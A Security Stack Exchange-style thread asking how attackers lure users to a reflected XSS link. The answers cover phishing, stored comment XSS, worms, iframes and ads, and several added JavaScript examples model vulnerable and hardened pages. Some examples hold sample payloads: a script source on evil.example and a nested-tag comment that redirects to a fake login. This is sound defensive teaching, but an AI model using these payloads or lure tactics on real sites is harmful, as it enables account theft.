Question About XSS — How do hackers make users access such a URL?
I've learned some knowledge about XSS recently; the basic idea is to make the user's browser execute some malicious code created by the hackers.
Say a page has a vulnerability that lets it load an arbitrary script; when a user accesses this URL:
http://www.somegoodsite.com/apage?filename=malicious.js
then the browser will load the "malicious.js" file without any question, and the user will be hacked.
My question is: how do hackers make users access such a URL?
In the case above and all other techniques like it, there is one precondition: the user does some action that they wouldn't usually do. If the hacker has to come and say 'hi, there is something funny, take a look!' to everyone, that won't be a very effective attack.
So, is there any magic to make this happen automatically? Or any real-life case where it happened?
xss social-engineering
"... the user did some actions that they won't do as usual..." - like clicking on a link on some web site or in a mail? Or maybe just the usual visit to the same website as before, in the case of stored XSS. That's all that is needed.
– Steffen Ullrich
1 hour ago
@SteffenUllrich Thanks for the comment. "Stored XSS" may require some other vulnerability, if there is no way to store this URL in the application. What would an experienced hacker do to use this vulnerability? Spam email? That's not pretty, I think.
– Hetfield Joe
1 hour ago
This is the magic way: <a href="somegoodsite.com/apage?filename=malicious.js">You won't believe what this guy can do with a banana!</a>
– Guillaume Beauvois
42 mins ago
asked 1 hour ago by Hetfield Joe
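The following is an added example, not code from the question or from any real site: a minimal model of the vulnerable page described above, which turns the `filename` query parameter straight into a `<script src>` tag, next to a hardened version that only serves scripts from a fixed allowlist. It also resolves the script source the way a browser would, which makes one point explicit that the question glosses over: a bare `malicious.js` is fetched from somegoodsite.com itself, so it only helps an attacker who can place a file there (an upload feature, say), whereas a protocol-relative or absolute value pulls code from a host they control. The page name `apage`, the allowlist entries, and the attacker host `evil.example` are assumptions for illustration.

```javascript
// Added example (not from the original question): a model of the vulnerable
// page that reflects ?filename= into a <script src>, beside a hardened one.
// "apage", the allowlist and the host evil.example are assumptions.
"use strict";

// Hardened version: the only scripts the parameter may select.
const ALLOWED_SCRIPTS = new Set(["app.js", "analytics.js"]);

// Vulnerable: whatever arrives in ?filename= becomes the script source.
function renderPageVulnerable(requestUrl) {
  const filename = new URL(requestUrl).searchParams.get("filename") || "app.js";
  return `<html><body><script src="${filename}"></script></body></html>`;
}

// Hardened: the parameter is a key into an allowlist, never a path or URL.
// "//evil.example/m.js", "https://evil.example/m.js" and "../x.js" all fail
// the lookup, so no attacker-chosen source can reach the <script> tag.
function renderPageSafe(requestUrl) {
  const filename = new URL(requestUrl).searchParams.get("filename") || "app.js";
  if (!ALLOWED_SCRIPTS.has(filename)) {
    return { ok: false, reason: "script not on allowlist",
             html: "<html><body>Unknown script</body></html>" };
  }
  return { ok: true, reason: null,
           html: `<html><body><script src="/static/${filename}"></script></body></html>` };
}

// Where will the browser actually fetch the script from? Resolve the src
// attribute of the vulnerable page against the page URL and report the origin.
function scriptOrigin(requestUrl) {
  const html = renderPageVulnerable(requestUrl);
  const match = /<script src="([^"]*)">/.exec(html);
  return new URL(match[1], requestUrl).origin;
}

// Usage: the URL from the question, plus two attacker-controlled variants.
const SAMPLE_URLS = [
  "http://www.somegoodsite.com/apage?filename=malicious.js",
  "http://www.somegoodsite.com/apage?filename=//evil.example/m.js",
  "http://www.somegoodsite.com/apage?filename=https://evil.example/m.js",
];
for (const u of SAMPLE_URLS) {
  console.log(u, "-> script fetched from", scriptOrigin(u),
              "| hardened page accepts:", renderPageSafe(u).ok);
}
```

The allowlist approach is preferable to trying to reject "bad" filenames: a blocklist has to anticipate every encoding of a slash, colon or dot-dot, while the lookup simply has no path through which attacker data reaches the HTML.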
3 Answers
There are two main types of XSS, reflective and persistent. Persistent XSS is when it is stored on the server, affecting other users, while reflective is not stored, but can still affect other users.
One method I've seen is to store something like a redirect in a comment that has poor sanitising. This way, the code is stored server-side, and when someone requests the page, the code is loaded along with the comments, which then triggers the block of code. This can then redirect the victim to the attacker's website, where other malicious things could be occurring, e.g. fake login pages for credential harvesting, stacks of ads, etc.
If you need more info let me know; I can edit when I'm back at the PC and add more details.
answered 1 hour ago by Connor J
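As an added example (not part of the answer above, and not code from any real site), here is the stored case the answer describes: a comment renderer with "poor sanitising" beside one that encodes on output. The attacker's comment carries a redirect to a fake login page and is served to every later visitor. The comment store, the user names and the host `evil.example` are constructed for illustration; the nested-tag payload is the classic way a one-pass tag strip is defeated.

```javascript
// Added example (not from the original answer): stored XSS through a comment
// field, with a blocklist "sanitiser" beside proper output encoding. Data and
// the host evil.example are constructed for illustration.
"use strict";

// Constructed comment store; the third entry is the attacker's. Removing the
// inner "<script>" from "<scr<script>ipt>" leaves "<script>" behind, so a
// single-pass strip reassembles the tag instead of removing it.
const COMMENTS = [
  { user: "alice", body: "Great article!" },
  { user: "bob", body: "Is 1 < 2 the right check in step 2?" },
  { user: "mallory",
    body: 'nice <scr<script>ipt>location="https://evil.example/login"</scr</script>ipt>' },
];

// Poor sanitising: a blocklist that strips the literal tags once.
function weakSanitize(s) {
  return s.replace(/<script>/gi, "").replace(/<\/script>/gi, "");
}

// Encode for the HTML text context. The database keeps the raw comment; the
// browser only ever receives inert text.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Vulnerable: comment bodies are interpolated after the blocklist pass.
function renderCommentsVulnerable(comments) {
  return comments
    .map((c) => `<li><b>${c.user}</b>: ${weakSanitize(c.body)}</li>`)
    .join("\n");
}

// Fixed: every untrusted value is encoded at the point it enters the HTML.
function renderCommentsSafe(comments) {
  return comments
    .map((c) => `<li><b>${escapeHtml(c.user)}</b>: ${escapeHtml(c.body)}</li>`)
    .join("\n");
}

// Crude check for the demonstration: does the HTML contain a script element?
function containsScriptElement(html) {
  return /<script\b[^>]*>/i.test(html);
}

console.log("vulnerable:\n" + renderCommentsVulnerable(COMMENTS));
console.log("safe:\n" + renderCommentsSafe(COMMENTS));
```

The fix is output encoding, not a better blocklist: once the renderer escapes every untrusted value for the context it lands in, it no longer matters what spelling of `<script>` the attacker stored. If comments are supposed to allow some markup, that calls for an HTML sanitiser that parses to a tree and rebuilds from an element allowlist, not for regular expressions over the string.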
"the user did some actions that they won't do as usual"
Clicking on a link does seem like a usual action for most users.
See for example this study, in which 56% of users clicked on links in e-mails from an unknown sender, and ~40% clicked on links sent via Facebook (despite 78% being aware of the possible danger). 50% said that they didn't click the link because they didn't know the sender.
That's already an impressive success rate. If the victim knows the attacker, or if the attacker spoofs the identity of someone they know, this rate could be increased even further.
On social networks, reflected XSS might also be wormable. In addition to the malicious action, the injected script could send messages containing the link to all friends of the victim (something like this happened to Twitter, for example).
In addition to e-mail, links could also be distributed in forums, blogs, issue trackers, and so on. This happened to Apache, for example.
edited 54 mins ago, answered 1 hour ago by tim
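The wormable case from the answer above, as an added example that is not part of the answer and does not touch any real network: a deterministic simulation in which the injected script's extra action is "send the link to every friend", and each recipient clicks with the rate the answer quotes (about 40%). The friend graph, the click rate and the random seed are constructed for illustration. It goes slightly beyond the answer in that it also counts the messages the worm generates, which is the signal a platform's abuse team would see first.

```javascript
// Added example (not from the original answer): simulation of a reflected-XSS
// worm on a social network. Friend graph, click rate and PRNG seed are
// constructed; nothing here contacts a real service.
"use strict";

// Constructed, undirected friend graph: who can be messaged by whom.
const FRIENDS = {
  v0: ["v1", "v2", "v3"],
  v1: ["v0", "v4"],
  v2: ["v0", "v4", "v5"],
  v3: ["v0"],
  v4: ["v1", "v2", "v6"],
  v5: ["v2"],
  v6: ["v4"],
};

// Small seeded LCG so runs are reproducible (Math.random cannot be seeded).
function makeRng(seed) {
  let state = seed >>> 0;
  return () => {
    state = (Math.imul(state, 1664525) + 1013904223) >>> 0;
    return state / 0x100000000; // uniform in [0, 1)
  };
}

// Breadth-first spread: when a user's browser runs the injected script, the
// script messages the malicious link to all of that user's friends. Each
// friend who has not yet been hit clicks with probability clickRate, which
// runs the same script in their own session and repeats the process.
function simulateWorm(graph, patientZero, clickRate, seed = 1) {
  const rng = makeRng(seed);
  const infected = new Set([patientZero]);
  const queue = [patientZero];
  let messagesSent = 0;
  while (queue.length) {
    const victim = queue.shift();
    for (const friend of graph[victim] || []) {
      messagesSent++;                       // the script messages everyone
      if (infected.has(friend)) continue;   // already running the payload
      if (rng() < clickRate) {              // the friend clicks the link
        infected.add(friend);
        queue.push(friend);
      }
    }
  }
  return { infected: [...infected].sort(), messagesSent };
}

// Usage: the click rate the answer cites, from one initial victim.
const run = simulateWorm(FRIENDS, "v0", 0.4, 7);
console.log(`infected ${run.infected.length}/${Object.keys(FRIENDS).length}`,
            `after ${run.messagesSent} messages:`, run.infected.join(", "));
```

The point the simulation makes is that the attacker only has to get one click; every later click is produced by a victim's own account messaging people who trust it, which is why the per-link click rate from the study matters more than the attacker's reach.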
For some attacks the victim needs to visit the attacker's page. There are a couple of ways to do that:
- Phishing. Send the victim an email, Facebook page, or LinkedIn invitation with a link pretending to be something else. The success rate of this depends on how much effort goes into the campaign, but success rates above 50% are not uncommon, especially because the domain name matches: you try to trick users of somegoodsite.com into clicking on a somegoodsite.com link, and this can generally be trusted.
- Inclusion from within the site itself. Sometimes the site permits users to add content. If the attacker can add an iframe to their profile page, anyone who accesses their profile will be attacked. However, it is pretty uncommon to be able to add an iframe to any site.
- Man-in-the-middle attack. In a man-in-the-middle attack the attacker can modify unencrypted data. Even if somegoodsite.com uses HTTPS, the attacker can inject an iframe into a webpage that doesn't use HTTPS and cause your browser to visit the URL.
- Advertisements. Some sites run intrusive advertisements that load a page in an iframe or even a new window. I sometimes get these with the message that I have won a free iPhone, but you could also run them with an XSS payload. However, I think sites that allow advertisements this intrusive are pretty rare.
answered 52 mins ago by Sjoerd
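Three of the four vectors above (profile-page iframe, MITM-injected iframe, ad iframe) load the vulnerable URL inside a frame, and the phishing vector loads it as a top-level navigation; which of these actually reaches an authenticated session depends on response headers the site controls. The following is an added example, not part of the answer and not any site's real configuration: a check of the headers that decide, for each vector, whether the page can be framed at all, whether the session cookie travels with that kind of request, and whether a Content-Security-Policy would stop the attacker-chosen script from the question in the first place. The header values and the cookie name `session` are constructed assumptions.

```javascript
// Added example (not from the original answer): which delivery vectors can
// reach an authenticated session, judged from response headers. Header
// values and the cookie name "session" are constructed for illustration.
"use strict";

// Parse "Content-Security-Policy: a b c; d e" into { a: ["b","c"], d: ["e"] }.
function parseCsp(header) {
  const directives = {};
  for (const part of (header || "").split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) {
      directives[tokens[0].toLowerCase()] = tokens.slice(1).map((t) => t.toLowerCase());
    }
  }
  return directives;
}

// Parse one Set-Cookie header into its name and the attributes that matter here.
function parseSetCookie(header) {
  const [nameValue, ...attrs] = header.split(";").map((s) => s.trim());
  const cookie = { name: nameValue.split("=")[0], sameSite: null, secure: false, httpOnly: false };
  for (const attr of attrs) {
    const [key, value = ""] = attr.split("=");
    switch (key.toLowerCase()) {
      case "samesite": cookie.sameSite = value.toLowerCase(); break;
      case "secure": cookie.secure = true; break;
      case "httponly": cookie.httpOnly = true; break;
    }
  }
  return cookie;
}

// headers: object keyed by lowercase header name; set-cookie may be an array.
function assessDeliveryVectors(headers) {
  const csp = parseCsp(headers["content-security-policy"]);
  const xfo = (headers["x-frame-options"] || "").trim().toUpperCase();
  const ancestors = csp["frame-ancestors"];

  // A cross-site <iframe> works unless X-Frame-Options or frame-ancestors forbids it.
  const frameable = !(xfo === "DENY" || xfo === "SAMEORIGIN" ||
                      (ancestors && !ancestors.includes("*")));

  // The bug in the question loads a script from an attacker-chosen source; the
  // effective script-src blocks that unless it permits arbitrary hosts.
  const scriptSrc = csp["script-src"] || csp["default-src"];
  const externalScriptsAllowed = !scriptSrc ||
    scriptSrc.some((s) => s === "*" || s === "http:" || s === "https:");

  const cookies = [].concat(headers["set-cookie"] || []).map(parseSetCookie);
  const session = cookies.find((c) => c.name === "session") || null;

  // Does the session cookie accompany the request? A top-level link click is a
  // cross-site GET navigation: Lax and None cookies are sent, Strict is not.
  const onTopLevelClick = !session ? "no-session"
    : session.sameSite === "strict" ? "no" : "yes";
  // A cross-site <iframe> load sends only SameSite=None cookies. A cookie with
  // no SameSite attribute is Lax by default in Chromium and sent by browsers
  // that have not adopted that default, so it is reported as browser-dependent.
  const inCrossSiteFrame = !session ? "no-session"
    : session.sameSite === "none" ? "yes"
    : session.sameSite === null ? "browser-dependent"
    : "no";

  return {
    externalScriptsAllowed,
    phishingLink: { viable: true, sessionSent: onTopLevelClick },
    iframeVectors: { // profile-page iframe, MITM-injected iframe, ad iframe
      viable: frameable,
      sessionSent: frameable ? inCrossSiteFrame : "n/a",
    },
  };
}

// Constructed header sets: a site with no hardening, and the same site fixed.
const WEAK_HEADERS = {
  "set-cookie": ["session=abc123; Path=/"],
};
const HARDENED_HEADERS = {
  "content-security-policy": "default-src 'self'; script-src 'self'; frame-ancestors 'none'",
  "x-frame-options": "DENY",
  "set-cookie": ["session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax"],
};

console.log("weak:", JSON.stringify(assessDeliveryVectors(WEAK_HEADERS)));
console.log("hardened:", JSON.stringify(assessDeliveryVectors(HARDENED_HEADERS)));
```

The result for the hardened headers is the caveat worth remembering: frame-ancestors and SameSite=Lax remove the three iframe vectors, but the phishing link still arrives with the session cookie, because Lax is designed to allow exactly that top-level click. Cookie attributes and framing rules narrow the delivery options; only fixing the injection itself (and a script-src that does not admit attacker hosts) closes the bug.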